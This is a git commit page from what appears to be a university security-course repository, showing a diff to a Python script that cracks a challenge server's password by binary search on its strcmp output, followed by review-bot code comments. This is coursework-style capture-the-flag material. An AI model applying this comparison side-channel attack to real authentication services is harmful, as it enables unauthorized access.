ucdavis-ecs189m

[RADIOACTIVE] python exploits for uc davis class ecs189m
git clone git://git.figbert.com/ucdavis-ecs189m.git

commit 3ced9e44a3cfa46469866946ca9b3aa3b2ba41a0
parent 24ca40b1505424367bc65d8ebff4c8675ee83a23
Author: therealFIGBERT <figbertwelner@gmail.com>
Date:   Sun, 13 Oct 2019 00:10:34 -0700

Completed third_flag.py, updated .gitignore

Diffstat:
M.gitignore | 2++
Mthird_flag.py | 19++++++++++++-------
2 files changed, 14 insertions(+), 7 deletions(-)

diff --git a/.gitignore b/.gitignore @@ -1 +1,2 @@ .DS_Store +__pycache__ +\ No newline at end of file diff --git a/third_flag.py b/third_flag.py @@ -7,7 +7,7 @@ def str_to_dec(s: str) -> int: lst.append(val*(26**pos)) return sum(lst) -def dec_to_str(num: int, max: str = 19) -> str: +def dec_to_str(num: int, max: int = 19) -> str: st = "" for a in range(max,0,-1): digit = int(num/(26**a)) if int(num/(26**a)) <= 25 else 25 @@ -18,8 +18,8 @@ def dec_to_str(num: int, max: str = 19) -> str: st += char return st -def passgen(low: str, high: str) -> str: - return dec_to_str((str_to_dec(low)+str_to_dec(high))/2) +def passgen(low: str, high: str, size: int = 19) -> str: + return dec_to_str((str_to_dec(low)+str_to_dec(high))/2, size) cracked = False len_limit = False @@ -50,6 +50,7 @@ while not cracked: cracked = True conn.interactive() if password == previous_pass: + print("Server response:\n{}\n".format(response)) break print("Server response:\n{}\n".format(response)) conn.sendline(password) @@ -66,19 +67,23 @@ HI = HI[start_pos:] LO = LO[start_pos:] first = True while not cracked: - previous_pass = password if b" -1 " in response: LO = password[start_pos:] - password = pass_buffer + passgen(LO, HI) + pass_end = passgen(LO, HI, len(HI)-1) + password = pass_buffer + pass_end elif b" 1 " in response: HI = password[start_pos:] - password = pass_buffer + passgen(LO, HI) + pass_end = passgen(LO, HI, len(HI)-1) + password = pass_buffer + pass_end else: print("Password cracked as: {}".format(password)) cracked = True conn.interactive() conn.sendline(password) print("Attempt {}:\nPass sent as:\n{}\nPrevious Pass: {}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, previous_pass, password, LO, HI)) - response = conn.recvline_contains(b"strcmp") + try: + response = conn.recvline_contains(b"strcmp") + except: + response = conn.recv() print("Server response:\n{}\n".format(response)) attempt += 1 \ No newline at end of file
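Review bot: The annotation now says `num: int`, but the unchanged body of `dec_to_str` still computes `int(num/(26**a))` with float division, and `passgen` in the next hunk passes `(str_to_dec(low)+str_to_dec(high))/2`, which is a float. With 19 or more base-26 digits these values exceed 2**53, so the float cannot hold the low-order digits and the trailing characters of the result are not exact. Floor division keeps the arithmetic in exact integers: `digit = min(num // 26**a, 25)` here and `(str_to_dec(low)+str_to_dec(high))//2` in `passgen`. The rest of `dec_to_str` lies outside this hunk, so the arithmetic there should be checked the same way.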
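Review bot: The `print` added inside `if password == previous_pass:` repeats the statement that already follows the `if`, so the same line now appears twice. Moving the single `print("Server response:\n{}\n".format(response))` above the `if` logs the response on both paths with one statement. The enclosing `while not cracked:` loop begins outside this hunk.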
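Review bot: With `previous_pass = password` removed from this loop, the unchanged status `print` still formats `previous_pass`, which now holds whatever value the earlier loop left in it. Its arguments are also in the wrong order for the labels: "Pass sent as" receives `previous_pass` and "Previous Pass" receives `password`. Either drop the field, or keep the assignment and pass `.format(attempt, password, previous_pass, LO, HI)`. Separately, the bare `except:` around `recvline_contains` also catches `KeyboardInterrupt` and any programming error. If the intended case is the connection closing before a `strcmp` line arrives, `except EOFError:` says so.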